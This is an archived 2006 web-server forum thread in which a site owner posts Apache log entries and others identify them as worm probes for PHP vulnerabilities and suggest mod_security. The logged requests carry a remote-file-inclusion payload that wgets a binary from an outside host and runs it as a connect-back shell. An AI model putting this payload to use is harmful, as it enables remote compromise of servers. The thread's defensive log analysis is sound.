Apache Server configuration support - how to recognize spammers in logs?

This is Interesting: Free IT Magazines  
Home > Archive > Apache Server configuration support > February 2006 > how to recognize spammers in logs?





You are viewing an archived Text-only version of the thread. To view this thread in it's original format and/or if you want to reply to this thread please [click here]

Author how to recognize spammers in logs?
Jake Barnes

2006-02-17, 10:29 pm


Would comment spammers be looking for the comments and trackbacks
addresses for possible installed weblog type software? I noticed this
bit in my logs:


209.250.116.251 - - [22/Jan/2006:19:35:56 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208
081;echo%20YYY;echo|
HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [22/Jan/2006:19:35:58 -0500] "GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%2080
81;echo%20YYY;echo|
HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [22/Jan/2006:19:35:59 -0500] "GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:00 -0500] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:01 -0500] "POST /xmlrpc.php
HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:02 -0500] "POST
/drupal/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:03 -0500] "POST
/phpgroupware/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:04 -0500] "POST
/wordpress/xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;)"



What's it all about? drupal? phpgroupware? wordpress?

This is all php software? Could it be bot looking for vulnerable
software?

Evan Platt

2006-02-17, 10:29 pm

On 15 Feb 2006 19:51:40 -0800, "Jake Barnes" <lkrubner@geocities.com>
wrote:

>209.250.116.251

CustName: Meserve, Mumpers & Hughes LLP
Address: 611 West Sixth Street, Suite 3201
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US
RegDate: 1998-12-16
Updated: 2005-05-09

Might want to e-mail them to make sure they don't have a infected
zombie machine. :-D
--
To reply, remove TheObvious from my e-mail address.
DiD

2006-02-17, 10:29 pm


"DiD" <notareal@mailspamout.com.invalid> ha scritto nel messaggio
news:43f47257$0$29104$5fc30a8@news.tiscali.it...
>
> I think that should be some kind of worms (anyone else have a clue ?) i
> get some of those entry in my log too.

after googling a bit i found this discussion

http://tinyurl.com/couo5

* exploits awstats.pl vulnerability


* exploits xmlrpc.php


MikeDawg

2006-02-17, 10:29 pm

I'd really recomment mod_security to filter out these sorts of
requests.

http://www.modsecurity.org

Sponsored Links






Free braindumps | Software forum | Database administration forum

Copyright 2003 - 2009 webservertalk.com